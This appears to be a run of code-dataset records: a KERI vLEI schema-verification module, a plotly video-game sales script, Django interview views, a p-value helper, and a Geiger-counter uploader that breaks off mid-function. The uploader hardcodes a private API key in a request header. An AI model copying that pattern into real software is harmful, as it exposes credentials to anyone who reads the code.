b'{\"$id\":\"ES63gXI-FmM6yQ7ISVIH__hOEhyE6W6-Ev0cArldsxuc\",'\n b'\"$schema\":\"http://json-schema.org/draft-07/schema#\",'\n b'\"title\":\"GLEIF vLEI Credential\",\"description\":\"The vLEI '\n b'Credential issued to GLEIF\",\"type\":\"object\",\"properties\":{\"v\":{'\n b'\"type\":\"string\"},\"d\":{\"type\":\"string\"},\"i\":{\"type\":\"string\"},'\n b'\"s\":{\"description\":\"schema SAID\",\"type\":\"string\"},'\n b'\"a\":{\"description\":\"data block\",\"properties\":{\"d\":{'\n b'\"type\":\"string\"},\"i\":{\"type\":\"string\"},'\n b'\"dt\":{\"description\":\"issuance date time\",\"format\":\"date-time\",'\n b'\"type\":\"string\"},\"ri\":{\"description\":\"credential status '\n b'registry\",\"type\":\"string\"},\"LEI\":{\"type\":\"string\"},'\n b'\"t\":{\"contains\":{\"const\":\"GLEIFvLEICredential\"},'\n b'\"type\":\"array\"}},\"additionalProperties\":false,\"required\":[\"d\",'\n b'\"dt\",\"ri\",\"LEI\",\"t\"],\"type\":\"object\"},\"p\":{\"maxItems\":0,'\n b'\"minItems\":0,\"type\":\"array\"}},\"additionalProperties\":false,'\n b'\"required\":[\"d\",\"i\"]}',\n \"E-_XCbf1LJ0v9CR7g-_gOknf5dpoZROgF7qG5T8mXCv8\": b'{\"$id\":\"E-_XCbf1LJ0v9CR7g-_gOknf5dpoZROgF7qG5T8mXCv8\",'\n b'\"$schema\":\"http://json-schema.org/draft-07/schema#\",'\n b'\"title\":\"Qualified vLEI Issuer Credential\",\"description\":\"A '\n b'vLEI Credential issued by GLEIF to Qualified vLEI Issuers which '\n b'allows the Qualified vLEI Issuers to issue, verify and revoke '\n b'Legal Entity vLEI Credentials and Legal Entity Official '\n b'Organizational Role vLEI Credentials\",\"properties\":{\"v\":{'\n b'\"type\":\"string\"},\"d\":{\"type\":\"string\"},\"i\":{\"type\":\"string\"},'\n b'\"s\":{\"description\":\"schema SAID\",\"type\":\"string\"},'\n b'\"a\":{\"description\":\"data block\",\"properties\":{\"d\":{'\n b'\"type\":\"string\"},\"i\":{\"type\":\"string\"},'\n b'\"dt\":{\"description\":\"issuance date time\",\"format\":\"date-time\",'\n b'\"type\":\"string\"},\"ri\":{\"description\":\"credential status '\n b'registry\",\"type\":\"string\"},\"LEI\":{\"type\":\"string\"},'\n b'\"gracePeriod\":{\"default\":90,\"type\":\"integer\"},\"t\":{\"contains\":{'\n b'\"const\":\"QualifiedvLEIIssuervLEICredential\"},\"type\":\"array\"}},'\n b'\"additionalProperties\":false,\"required\":[\"i\",\"dt\",\"ri\",\"LEI\",'\n b'\"t\"],\"type\":\"object\"},\"p\":{\"maxItems\":0,\"minItems\":0,'\n b'\"type\":\"array\"}},\"additionalProperties\":false,\"required\":[\"i\",'\n b'\"d\"],\"type\":\"object\"}',\n})\n\n\nclass JSONSchema:\n \"\"\"\n JSON Schema support class\n \"\"\"\n id_ = Ids.dollar # ID Field Label\n\n def __init__(self, resolver=CacheResolver()):\n self.resolver = resolver\n\n def resolve(self, uri):\n return self.resolver.resolve(uri)\n\n def load(self, raw=b'', kind=Serials.json):\n if kind == Serials.json:\n try:\n sed = json.loads(raw.decode(\"utf-8\"))\n except Exception as ex:\n raise DeserializationError(\"Error deserializing JSON: {} {}\"\n \"\".format(raw.decode(\"utf-8\"), ex))\n\n elif kind == Serials.mgpk:\n try:\n sed = msgpack.loads(raw)\n except Exception as ex:\n raise DeserializationError(\"Error deserializing MGPK: {} {}\"\n \"\".format(raw, ex))\n\n elif kind == Serials.cbor:\n try:\n sed = cbor.loads(raw)\n except Exception as ex:\n raise DeserializationError(\"Error deserializing CBOR: {} {}\"\n \"\".format(raw, ex))\n else:\n raise ValueError(\"Invalid serialization kind = {}\".format(kind))\n\n if self.id_ in sed:\n saider = Saider(qb64=sed[self.id_], label=self.id_)\n said = sed[self.id_]\n if 
not saider.verify(sed, prefixed=True, kind=kind, label=self.id_):\n raise ValidationError(\"invalid self-addressing identifier {} instead of {} in schema = {}\"\n \"\".format(said, saider.qb64, sed))\n else:\n raise ValidationError(\"missing ID field {} in schema = {}\"\n \"\".format(self.id_, sed))\n\n return sed, kind, saider\n\n @staticmethod\n def dump(sed, kind=Serials.json):\n raw = coring.dumps(sed, kind)\n return raw\n\n @staticmethod\n def detect(raw=b''):\n \"\"\"\n Returns True if content represents JSON Schema by checking\n for $schema; False otherwise\n \"\"\"\n\n try:\n raw.index(b'\"$schema\"')\n except ValueError:\n return False\n\n return True\n\n @staticmethod\n def verify_schema(schema):\n \"\"\"\n Returns True if the provided schema validates successfully\n as compliant Draft 7 JSON Schema, False otherwise\n\n Parameters:\n schema (dict): is the JSON schema to verify\n \"\"\"\n try:\n jsonschema.Draft7Validator.check_schema(schema=schema)\n except jsonschema.exceptions.SchemaError:\n return False\n\n return True\n\n def verify_json(self, schema=b'', raw=b''):\n \"\"\"\n Returns True if the JSON passes validation against the\n provided compliant Draft 7 JSON Schema. Returns False\n if raw is not valid JSON, schema is not valid JSON Schema or\n the validation fails\n\n Parameters:\n schema (bytes): is the schema used for validation\n raw (bytes): is JSON to validate against the Schema\n \"\"\"\n try:\n d = json.loads(raw)\n jsonschema.validate(instance=d, schema=schema, resolver=self.resolver.resolver(scer=raw))\n except jsonschema.exceptions.ValidationError as ex:\n logger.error(f'jsonschema.exceptions.ValidationError {ex}')\n return False\n except jsonschema.exceptions.SchemaError as ex:\n logger.error(f'jsonschema.exceptions.SchemaError {ex}')\n return False\n except json.decoder.JSONDecodeError as ex:\n logger.error(f'json.decoder.JSONDecodeError {ex}')\n return False\n except Exception:\n return False\n\n return True\n\n\nclass Schemer:\n \"\"\"\n Schemer is KERI schema serializer-deserializer class\n Verifies self-addressing identifier based on schema type\n Only supports current version VERSION\n\n Has the following public properties:\n\n Properties:\n .raw is bytes of serialized event only\n .sed is JSON schema dict\n .kind is Schema kind string value (see namedtuple coring.Serials)\n .saider is Saider instance of self-addressing identifier\n .said is qb64 digest from .saider\n\n Hidden Attributes:\n ._raw is bytes of serialized schema only\n ._sed is JSON schema dict\n ._kind is schema kind string value (see namedtuple coring.Serials)\n supported kinds are 'JSONSchema'\n ._code is default code for .saider\n ._saider is Saider instance of digest of .raw\n\n\n \"\"\"\n\n def __init__(self, raw=b'', sed=None, kind=None, typ=JSONSchema(), code=MtrDex.Blake3_256):\n \"\"\"\n Deserialize if raw provided\n Serialize if sed provided but not raw\n When serializing, if kind is provided then use kind instead of the field in sed\n\n Parameters:\n raw is bytes of serialized schema\n sed is JSON dict or None\n if None it is deserialized from raw\n schemaType is the type of schema\n kind is serialization kind string value or None (see namedtuple coring.Serials)\n supported kinds are 'json', 'cbor', 'msgpack', 'binary'\n if kind is None then it is extracted from ked or raw\n code is .saider default digest code\n\n \"\"\"\n\n self._code = code\n if raw:\n self.raw = raw\n elif sed:\n self.typ = typ\n self._kind = kind\n self.sed = sed\n else:\n raise ValueError(\"Improper initialization need 
raw or sed.\")\n\n if not self._verify_schema():\n raise ValidationError(\"invalid kind {} for schema {}\"\n \"\".format(self.kind, self.sed))\n\n def _inhale(self, raw):\n \"\"\"\n Loads type specific Schema ked and verifies the self-addressing identifier\n of the raw content\n\n Parameters:\n raw: JSON to load\n\n \"\"\"\n self.typ = self._sniff(raw)\n sed, kind, saider = self.typ.load(raw=raw)\n\n return sed, kind, saider\n\n def _exhale(self, sed, kind=None):\n \"\"\"\n Dumps type specific Schema JSON and returns the raw bytes, sed\n and schema kind\n\n Parameters:\n sed: JSON to load\n kind (Schema) tuple of schema type\n\n \"\"\"\n saider = Saider(sad=sed, code=self._code, label=self.typ.id_)\n sed[self.typ.id_] = saider.qb64\n raw = self.typ.dump(sed)\n\n return raw, sed, kind, saider\n\n @staticmethod\n def _sniff(raw):\n try:\n raw.index(b'\"$schema\"')\n except ValueError:\n pass\n else:\n return JSONSchema()\n\n # Default for now is JSONSchema because we don't support any other\n return JSONSchema()\n\n @property\n def raw(self):\n \"\"\" raw property getter \"\"\"\n return self._raw\n\n @raw.setter\n def raw(self, raw):\n \"\"\" raw property setter \"\"\"\n sed, kind, saider = self._inhale(raw=raw)\n self._raw = bytes(raw) # crypto ops require bytes not bytearray\n self._sed = sed\n self._kind = kind\n self._saider = saider\n\n @property\n def sed(self):\n \"\"\" ked property getter\"\"\"\n return self._sed\n\n @sed.setter\n def sed(self, sed):\n \"\"\" ked property setter assumes ._kind \"\"\"\n raw, sed, kind, saider = self._exhale(sed=sed, kind=self._kind)\n self._raw = raw\n self._kind = kind\n self._sed = sed\n self._saider = saider\n\n @property\n def kind(self):\n \"\"\" kind property getter \"\"\"\n return self._kind\n\n @kind.setter\n def kind(self, kind):\n \"\"\" kind property setter Assumes ._ked \"\"\"\n raw, kind, sed, saider = self._exhale(sed=self._sed, kind=kind)\n self._raw = raw\n self._sed = sed\n self._kind = kind\n self._saider = Saider(raw=self._raw, code=self._code, label=Ids.dollar)\n\n @property\n def saider(self):\n \"\"\" saider property getter \"\"\"\n return self._saider\n\n @property\n def said(self):\n \"\"\" said property getter, relies on saider \"\"\"\n return self.saider.qb64\n\n def verify(self, raw=b''):\n \"\"\"\n Returns True if derivation from ked for .code matches .qb64 and\n If prefixed also verifies ked[\"i\"] matches .qb64\n False otherwise\n\n Parameters:\n raw (bytes): is serialised JSON content to verify against schema\n \"\"\"\n\n return self.typ.verify_json(schema=self.sed, raw=raw)\n\n def _verify_schema(self):\n \"\"\"\n Returns True if derivation from ked for .code matches .qb64 and\n If prefixed also verifies ked[\"i\"] matches .qb64\n False otherwise\n\n \"\"\"\n\n return self.typ.verify_schema(schema=self.sed)\n", "sub_path": "src/keri/core/scheming.py", "file_name": "scheming.py", "file_ext": "py", "file_size_in_byte": 23519, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "jsonschema.RefResolver", "line_number": 77, "usage_type": "call"}, {"api_name": "coring.Ids.dollar", "line_number": 204, "usage_type": "attribute"}, {"api_name": "coring.Ids", "line_number": 204, "usage_type": "name"}, {"api_name": "coring.Serials.json", "line_number": 212, "usage_type": "attribute"}, {"api_name": "coring.Serials", "line_number": 212, "usage_type": "name"}, {"api_name": "coring.Serials.json", "line_number": 213, "usage_type": "attribute"}, {"api_name": 
"coring.Serials", "line_number": 213, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 215, "usage_type": "call"}, {"api_name": "kering.DeserializationError", "line_number": 217, "usage_type": "call"}, {"api_name": "coring.Serials.mgpk", "line_number": 220, "usage_type": "attribute"}, {"api_name": "coring.Serials", "line_number": 220, "usage_type": "name"}, {"api_name": "msgpack.loads", "line_number": 222, "usage_type": "call"}, {"api_name": "kering.DeserializationError", "line_number": 224, "usage_type": "call"}, {"api_name": "coring.Serials.cbor", "line_number": 227, "usage_type": "attribute"}, {"api_name": "coring.Serials", "line_number": 227, "usage_type": "name"}, {"api_name": "cbor2.loads", "line_number": 229, "usage_type": "call"}, {"api_name": "kering.DeserializationError", "line_number": 231, "usage_type": "call"}, {"api_name": "coring.Saider", "line_number": 237, "usage_type": "call"}, {"api_name": "kering.ValidationError", "line_number": 240, "usage_type": "call"}, {"api_name": "kering.ValidationError", "line_number": 243, "usage_type": "call"}, {"api_name": "coring.Serials.json", "line_number": 249, "usage_type": "attribute"}, {"api_name": "coring.Serials", "line_number": 249, "usage_type": "name"}, {"api_name": "coring.dumps", "line_number": 250, "usage_type": "call"}, {"api_name": "jsonschema.Draft7Validator.check_schema", "line_number": 277, "usage_type": "call"}, {"api_name": "jsonschema.Draft7Validator", "line_number": 277, "usage_type": "attribute"}, {"api_name": "jsonschema.exceptions", "line_number": 278, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 295, "usage_type": "call"}, {"api_name": "jsonschema.validate", "line_number": 296, "usage_type": "call"}, {"api_name": "jsonschema.exceptions", "line_number": 297, "usage_type": "attribute"}, {"api_name": "jsonschema.exceptions", "line_number": 300, "usage_type": "attribute"}, {"api_name": "json.decoder", "line_number": 303, "usage_type": "attribute"}, {"api_name": "coring.MtrDex.Blake3_256", "line_number": 338, "usage_type": "attribute"}, {"api_name": "coring.MtrDex", "line_number": 338, "usage_type": "name"}, {"api_name": "kering.ValidationError", "line_number": 367, "usage_type": "call"}, {"api_name": "coring.Saider", "line_number": 394, "usage_type": "call"}, {"api_name": "coring.Saider", "line_number": 452, "usage_type": "call"}, {"api_name": "coring.Ids.dollar", "line_number": 452, "usage_type": "attribute"}, {"api_name": "coring.Ids", "line_number": 452, "usage_type": "name"}]} +{"seq_id": "153938511", "text": "import re\nimport plotly\nimport plotly.graph_objs as go\nfrom plotly import tools\nfrom collections import Counter\n\nnan = float('nan')\n\ninput_file = '../filereader/vgsales.csv'\n\n\ndef getYear(line):\n result = re.split(r',', line, maxsplit=1)\n Year = re.findall(r'[1-3][0-9]{3}', result[0])\n return Year[0], result[1]\n\n\ndef getPlatform(line):\n result = re.split(r',', line, maxsplit=1)\n Platform = result[0].strip()\n return Platform, result[1]\n\n\ndef getName(line):\n result = re.split(r',', line, maxsplit=1)\n return result[0], result[1]\n\n\ndef getRank(line):\n result = re.split(r',', line, maxsplit=1)\n return result[0], result[1]\n\n\ncurrent_line = 0\ni = 0\ntry:\n\n with open(input_file, encoding=\"utf8\", mode='r') as file:\n file.readline()\n line_number = 1\n dataset = {}\n for line in file:\n i += 1\n\n columns = line.split(',')\n\n Rank, line = getRank(line)\n Name, line = getName(line)\n Platform, line = getPlatform(line)\n try:\n Year, line = 
getYear(line)\n except IndexError:\n Year = 'Unknown'\n if Year not in list(dataset.keys()):\n dataset[Year] = {}\n\n if Platform not in list(dataset[Year].keys()):\n dataset[Year][Platform] = dict()\n\n if Name not in dataset[Year][Platform]:\n dataset[Year][Platform][Name] = Rank\n # print(dataset)\n print(dataset)\nexcept IOError:\n print('Error with file', IOError.errno, IOError.strerror)\nexcept ValueError:\n print('Error in line', current_line, ValueError)\n\ninput_file = '../filereader/vgsales.csv'\nwith open(input_file, encoding=\"utf8\", mode='r') as file:\n file.readline()\n\n count_of_game = dict()\n\n for line in file:\n columns = line.split(',')\n Name = columns[1]\n Year = columns[3]\n\n if Year not in count_of_game:\n count_of_game[Year] = list()\n if Name not in count_of_game[Year]:\n count_of_game[Year].append(Name)\n #print(count_of_game)\n\nv = -1\ncount = []\nwhile v != 541:\n v += 1\n count.append(len((count_of_game[Year])[v]))\n\n#print(list(count_of_game.keys()))\n#print(count)\nscat = go.Scatter(x=list(count_of_game.keys()),\n y=count,\n name='Year - count of game')\n\nwith open(input_file, encoding=\"utf8\", mode='r') as file:\n file.readline()\n\n platforms = list()\n\n for line in file:\n columns = line.split(',')\n Platform = columns[2]\n\n platforms.append(Platform)\n #print(platforms)\n\nplatforms1 = Counter(platforms)\n#print(platforms1)\n\npie = go.Pie(labels=list(platforms1.keys()),\n values=list(platforms1.values()))\n\nwith open(input_file, encoding=\"utf8\", mode='r') as file:\n file.readline()\n\n rank = dict()\n\n for line in file:\n columns = line.split(',')\n\n Rank = columns[0]\n Platform = columns[2]\n\n if Platform not in rank:\n rank[Platform] = set()\n\n rank[Platform].add(float(Rank))\n #print(rank)\n\nmax_rank = list()\nfor Platform in rank:\n maximum = max(rank[Platform])\n max_rank.append(maximum)\n#print(max_rank)\n\nbar = go.Bar(x=list(rank.keys()),\n y=max_rank)\n\n'''fig = tools.make_subplots(rows=2, cols=2)\n\nfig.append_trace(bar, 1, 1)\n\n#fig.append_trace(pie, 2, 1)\n\nfig.append_trace(scat, 2, 2)'''\n\nfig={\n 'data':[\n {\n \"values\": list(platforms1.values()),\n \"labels\": list(platforms1.keys()),\n\n \"domain\": {\"x\": [0, .45],\n \"y\":[0.55, 1]},\n\n \"type\": \"pie\"\n },\n\n {\"x\":list(rank.keys()),\n \"y\":max_rank,\n \"xaxis\": \"x2\",\n \"yaxis\": \"y2\",\n \"type\":\"bar\"\n },\n\n {\"x\":list(count_of_game.keys()),\n \"y\":count,\n \"type\": \"scatter\"}\n],\n\"layout\" : go.Layout(\n xaxis=dict(domain=[0, 0.45]), yaxis=dict(domain=[0, 0.45]),\n xaxis2=dict(domain=[0.55, 1]), yaxis2=dict(domain=[0, 0.45], anchor='x2'))}\nplotly.offline.plot(fig, filename=\"myplotly.html\")\n\n\n", "sub_path": "workshop6(1).py", "file_name": "workshop6(1).py", "file_ext": "py", "file_size_in_byte": 4052, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "re.split", "line_number": 13, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 14, "usage_type": "call"}, {"api_name": "re.split", "line_number": 19, "usage_type": "call"}, {"api_name": "re.split", "line_number": 25, "usage_type": "call"}, {"api_name": "re.split", "line_number": 30, "usage_type": "call"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 94, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 94, "usage_type": "name"}, {"api_name": "collections.Counter", "line_number": 110, "usage_type": "call"}, {"api_name": "plotly.graph_objs.Pie", "line_number": 113, 
"usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 113, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Bar", "line_number": 139, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 139, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Layout", "line_number": 173, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 173, "usage_type": "name"}, {"api_name": "plotly.offline.plot", "line_number": 176, "usage_type": "call"}, {"api_name": "plotly.offline", "line_number": 176, "usage_type": "attribute"}]} +{"seq_id": "169267013", "text": "from django.shortcuts import render\nfrom django.views import View\nfrom .models import *\nfrom .forms import *\nfrom django.contrib import messages\nfrom django.http import HttpResponseRedirect,JsonResponse,HttpResponse\nfrom django.template.loader import render_to_string\nfrom django.template import RequestContext, context\nimport json\n# Create your views here.\n\n\nclass InterviewView(View):\n\n def post(self,request):\n message=[]\n my_form=InterviewForm(request.POST or None)\n if my_form.is_valid():\n title=my_form.cleaned_data['title']\n date=my_form.cleaned_data['date']\n if title==\"\":\n message.append('Title name shouldn\\'t be empty')\n elif date==\"\":\n message.append('Date name shouldn\\'t be empty')\n else:\n my_form.save()\n message.append('Interview added sucessfully')\n msg = render_to_string('messages.html', {'messages':message})\n all_list=InterviewModel.objects.all().order_by('-id')\n interviewlist=render_to_string('interview/interviewlistTbody.html', {'all_list':all_list})\n context={'msg':msg,'interviewlist':interviewlist}\n context=json.dumps(context)\n return HttpResponse(context,content_type='application/json')\n \n\n\ndef interviewlist(request):\n all_list=InterviewModel.objects.all().order_by('-id')\n return render(request, 'interview/interviewlist.html',{'all_list':all_list,'form':InterviewForm})\n\nclass interviewEdit(View):\n def get(self,request,pk):\n inter_view=InterviewModel.objects.get(pk=pk)\n my_form=InterviewForm(instance=inter_view)\n data=render_to_string('interview/interviewedit.html',{'form':my_form,'id':inter_view.id},request=request)\n #data={'id':inter_view.id,'title':inter_view.title,'date':inter_view.date}\n #return JsonResponse(data)\n return HttpResponse(data)\n \n def post(self,request,pk):\n message=[]\n inter_view=InterviewModel.objects.get(pk=pk)\n my_form=InterviewForm(request.POST,request.FILES,instance=inter_view)\n if my_form.is_valid():\n title=my_form.cleaned_data['title']\n date=my_form.cleaned_data['date']\n if title==\"\":\n messages.info(request, 'Title name shouldn\\'t be empty')\n elif date==\"\":\n messages.info(request, 'Date name shouldn\\'t be empty')\n else:\n my_form.save()\n message.append('Interview edited sucessfully')\n msg = render_to_string('messages.html', {'messages':message})\n row=render_to_string('interview/tablerow.html',{'list':inter_view},request=request)\n context={'msg':msg,'row':row}\n context=json.dumps(context)\n return HttpResponse(context,content_type='application/json')\n\ndef deleteInterview(request,pk):\n instance = InterviewModel.objects.get(pk=pk)\n instance.delete()\n messages.info(request, 'Sucessfully deleted')\n return HttpResponseRedirect('/')\n\n\ndef sessionlist(request):\n all_list=Session.objects.all()\n return render(request, 'sessionlist.html',{'all_list':all_list})\n\n\nclass AddSessionView(View):\n def get(self,request):\n return render(request, 
'addsession.html',{'form':SessionForm})\n\n def post(self,request):\n my_form=SessionForm(request.POST)\n if my_form.is_valid():\n title=my_form.cleaned_data['title']\n date=my_form.cleaned_data['date']\n applicant=my_form.cleaned_data['aplicant']\n if title==\"\":\n messages.info(request, 'Title name shouldn\\'t be empty')\n elif date==\"\":\n messages.info(request, 'Date name shouldn\\'t be empty')\n else:\n my_form.save()\n return HttpResponseRedirect('/sessionlist')\n \n\nclass sessionEdit(View):\n def get(self,request,pk):\n inter_view=Session.objects.get(pk=pk)\n my_form=SessionForm(instance=inter_view)\n return render(request, 'sessionedit.html',{'form':my_form})\n \n def post(self,request,pk):\n inter_view=Session.objects.get(pk=pk)\n my_form=SessionForm(request.POST,request.FILES,instance=inter_view)\n if my_form.is_valid():\n title=my_form.cleaned_data['title']\n date=my_form.cleaned_data['date']\n messages.info(request, 'Title name shouldn\\'t be empty')\n if title==\"\":\n messages.info(request, 'Title name shouldn\\'t be empty')\n elif date==\"\":\n messages.info(request, 'Date name shouldn\\'t be empty')\n else:\n my_form.save()\n return HttpResponseRedirect('/sessionlist')\n\ndef deletesession(request,pk):\n instance = Session.objects.get(pk=pk)\n instance.delete()\n messages.info(request, 'Sucessfully deleted')\n return HttpResponseRedirect('/sessionlist')", "sub_path": "interview/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 5034, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "django.views.View", "line_number": 13, "usage_type": "name"}, {"api_name": "django.template.loader.render_to_string", "line_number": 28, "usage_type": "call"}, {"api_name": "django.template.loader.render_to_string", "line_number": 30, "usage_type": "call"}, {"api_name": "django.template.context", "line_number": 31, "usage_type": "name"}, {"api_name": "django.template.context", "line_number": 32, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 32, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 33, "usage_type": "call"}, {"api_name": "django.template.context", "line_number": 33, "usage_type": "argument"}, {"api_name": "django.shortcuts.render", "line_number": 39, "usage_type": "call"}, {"api_name": "django.views.View", "line_number": 41, "usage_type": "name"}, {"api_name": "django.template.loader.render_to_string", "line_number": 45, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 48, "usage_type": "call"}, {"api_name": "django.contrib.messages.info", "line_number": 58, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 58, "usage_type": "name"}, {"api_name": "django.contrib.messages.info", "line_number": 60, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 60, "usage_type": "name"}, {"api_name": "django.template.loader.render_to_string", "line_number": 64, "usage_type": "call"}, {"api_name": "django.template.loader.render_to_string", "line_number": 65, "usage_type": "call"}, {"api_name": "django.template.context", "line_number": 66, "usage_type": "name"}, {"api_name": "django.template.context", "line_number": 67, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 67, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 68, "usage_type": "call"}, {"api_name": "django.template.context", "line_number": 68, "usage_type": 
"argument"}, {"api_name": "django.contrib.messages.info", "line_number": 73, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 73, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 74, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 79, "usage_type": "call"}, {"api_name": "django.views.View", "line_number": 82, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 84, "usage_type": "call"}, {"api_name": "django.contrib.messages.info", "line_number": 93, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 93, "usage_type": "name"}, {"api_name": "django.contrib.messages.info", "line_number": 95, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 95, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 98, "usage_type": "call"}, {"api_name": "django.views.View", "line_number": 101, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 105, "usage_type": "call"}, {"api_name": "django.contrib.messages.info", "line_number": 113, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 113, "usage_type": "name"}, {"api_name": "django.contrib.messages.info", "line_number": 115, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 115, "usage_type": "name"}, {"api_name": "django.contrib.messages.info", "line_number": 117, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 117, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 120, "usage_type": "call"}, {"api_name": "django.contrib.messages.info", "line_number": 125, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 125, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 126, "usage_type": "call"}]} +{"seq_id": "348819686", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Nov 26 17:04:38 2020\n\n@author: shamu\n\"\"\"\ndef Pvalue(Vari,Sampling_n,Compo_n):\n from scipy.stats import norminvgauss\n import numpy as np\n from tqdm import tqdm\n # import random\n # random.seed('')\n t,idx,idy = Vari.shape\n R_Vari = np.zeros([Sampling_n,idx,idy]) \n\n x_Mean = np.zeros([idx,idy])\n x_Var = np.zeros_like(x_Mean)\n x_Norminv = np.zeros([2,idx,idy])\n print('Processing...(1/2)')\n for i in tqdm(range(Sampling_n)):\n for j in range(idx):\n for k in range(idy):\n R_num = np.random.randint(low=0,high=t,size=Compo_n)\n R_Vari[i,j,k] = np.squeeze( np.nanmean(Vari[R_num,j,k]) )\n print('Processing...(2/2)')\n for i in range(idx):\n for j in range(idy):\n x_Mean[i,j] = np.nanmean(np.squeeze(R_Vari[:,i,j]))\n x_Var[i,j] = np.sqrt(np.squeeze(R_Vari[:,i,j]).var())\n x_Norminv[:,i,j] = norminvgauss.ppf([.5,.95],x_Mean[i,j],x_Var[i,j])\n return x_Mean, x_Var, x_Norminv\n ", "sub_path": "Ori/psi_package/pvalue.py", "file_name": "pvalue.py", "file_ext": "py", "file_size_in_byte": 1070, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "numpy.zeros", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 19, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 21, "usage_type": "call"}, 
{"api_name": "numpy.random.randint", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 24, "usage_type": "attribute"}, {"api_name": "numpy.squeeze", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.nanmean", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.nanmean", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 30, "usage_type": "call"}, {"api_name": "scipy.stats.norminvgauss.ppf", "line_number": 31, "usage_type": "call"}, {"api_name": "scipy.stats.norminvgauss", "line_number": 31, "usage_type": "name"}]} +{"seq_id": "76581725", "text": "#!/usr/bin/env python3\n\nimport gimpbbio.gpio as gpio\nimport serial\nimport re\nimport http.client\nimport urllib\nimport threading\nimport queue\nimport sys\nimport datetime\nimport time\nimport socket\nimport logging\nimport logging.handlers\nimport argparse\nimport json\nimport Adafruit_BMP.BMP085 as BMP085\n\nclass MyLogger(object):\n\tdef __init__(self, logger, level):\n\t\t\"\"\"Needs a logger and a logger level.\"\"\"\n\t\tself.logger = logger\n\t\tself.level = level\n \n\tdef write(self, message):\n\t\t# Only log if there is a message (not just a new line)\n\t\tif message.rstrip() != \"\":\n\t\t\tself.logger.log(self.level, message.rstrip())\n\nparser = argparse.ArgumentParser(description=\"geiger-counter\")\nparser.add_argument(\"-l\", \"--log\", help=\"file to write log to\")\nparser.add_argument(\"key\", help=\"Phant private key\")\n\nargs = parser.parse_args()\nif args.log:\n\tLOG_LEVEL = logging.INFO # Could be e.g. \"DEBUG\" or \"WARNING\"\n\tLOG_FILENAME = args.log\n \n\tlogger = logging.getLogger(__name__)\n\tlogger.setLevel(LOG_LEVEL)\n\thandler = logging.handlers.TimedRotatingFileHandler(LOG_FILENAME, when=\"midnight\", backupCount=14)\n\tformatter = logging.Formatter('%(asctime)s %(levelname)-8s %(message)s')\n\thandler.setFormatter(formatter)\n\tlogger.addHandler(handler)\n\t\n\tsys.stdout = MyLogger(logger, logging.INFO)\n\tsys.stderr = MyLogger(logger, logging.ERROR)\n\nprint(\"Starting up\")\n\naltitude_in_meters = 112\nphant_url = 'gimp-phant.azurewebsites.net'\nphant_public_key = 'kgkWV69Nqnupn6W9Xbo6'\npressure_samples = []\n\npressure_sampling_lock = threading.Lock()\nqueue = queue.Queue()\n\nuart = gpio.uarts.uart1\nuart.open()\n\n# We have a quarter-second timeout because if we start reading in\n# the middle of a serial message or if a byte is dropped for any\n# reason, we'll throw away the partial message and try again\nser = serial.Serial(port = \"/dev/ttyO1\", baudrate=9600, timeout=0.25) \n\npressure_sensor = BMP085.BMP085(mode=BMP085.BMP085_ULTRAHIGHRES)\n\nheaders = {\n\t\"Phant-Private-Key\": str(args.key),\n\t'Content-Type': 'application/x-www-form-urlencoded'\n}\n\nlogstash_url = 'logstash.saintgimp.org'\nlogstash_headers = {\n \"SaintGimp-Private-Key\": 'banana55',\n 'Content-Type': 'application/json'\n}\n\ndef sendData():\n\twhile True:\n\t\tbody = 